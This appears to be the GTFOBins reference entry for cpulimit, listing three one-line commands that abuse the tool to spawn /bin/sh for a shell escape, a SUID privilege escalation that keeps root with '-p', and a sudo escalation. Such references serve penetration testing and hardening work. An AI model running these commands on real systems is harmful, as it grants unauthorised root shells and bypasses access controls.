GTFOBins.github.io/_gtfobins/cpulimit.md
2021-02-27 12:06:40 +01:00

174 B

functions
shell suid sudo
code
cpulimit -l 100 -f /bin/sh
code
./cpulimit -l 100 -f -- /bin/sh -p
code
sudo cpulimit -l 100 -f /bin/sh